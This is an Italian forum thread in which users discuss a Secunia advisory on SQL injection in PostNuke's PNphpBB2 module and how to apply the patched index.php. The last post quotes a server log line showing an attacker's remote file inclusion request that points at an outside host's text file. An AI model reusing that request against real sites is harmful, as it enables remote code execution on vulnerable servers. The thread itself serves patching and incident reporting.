PostNukeItalia.com :: Leggi la discussione - Security Alert

PostNukeItalia.com

PNphpBB2 - Security Alert - PostNuke PNphpBB2 Module "c" SQL

motociclante - 12 Giu 2007 - 06:49 AM
Oggetto: Security Alert - PostNuke PNphpBB2 Module "c" SQL

Tratto da Secunia.com

L'articolo completo: http://secunia.com/advisories/25480/

Description:
Kacper has discovered a vulnerability in the PNphpBB2 module for PostNuke, which can be exploited by malicious people to conduct SQL injection attacks.

Saluti.

Argos - 25 Giu 2007 - 07:22 AM
Oggetto: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module "c&

Sostituire il file index.php dopo averlo scaricato da qui

motociclante - 26 Giu 2007 - 03:30 AM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &quo

Argos ha scritto:

Sostituire il file index.php dopo averlo scaricato da qui

Ho provato a sostituire il file ma dice "Accesso non autorizzato"

Argos - 26 Giu 2007 - 09:34 AM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &

Allora prima lo elimini e dopo lo carichi con il tuo programma FTP.

motociclante - 26 Giu 2007 - 09:53 AM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &

Argos ha scritto:

Allora prima lo elimini e dopo lo carichi con il tuo programma FTP.

E' esattamente quello che ho fatto anche io ma senza successo. Sad

Ma questo index.php va copiato nella root del sito web o nella root del modulo del forum? Scusa se chiedo una minchiata.

Argos - 27 Giu 2007 - 03:28 AM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &

va sostituito con il file index.php della cartella del forum PNphpBB2.

motociclante - 27 Giu 2007 - 04:51 AM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &

Argos ha scritto:

va sostituito con il file index.php della cartella del forum PNphpBB2.

GRAAAAAAAAAAZIE mille. Fatto e funziona.

Cheers.

toluc - 02 Apr 2008 - 03:10 PM
Oggetto: Re: [RISOLTO] Security Alert - PostNuke PNphpBB2 Module &quo

Argos ha scritto:

Sostituire il file index.php dopo averlo scaricato da qui

Ho appena ricevuto un attacco al forum, avevo installato la versione di dicembre 2007, pensavo che fosse comprensiva di tutte le patch con data anteriore...

In caso contrario quali devo inserire?

L'estratto del log che mi hanno madato è il seguente:

"84.18.207.64 - - [01/Apr/2008:06:47:12 +0200] "GET
/modules.php?op=modload&name=PNphpBB2&file=index&c=1//?
mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt??
HTTP/1.1" 200 17368 "-" "libwww-perl/5.808"

Vi ringrazio anticipatamente,

Luca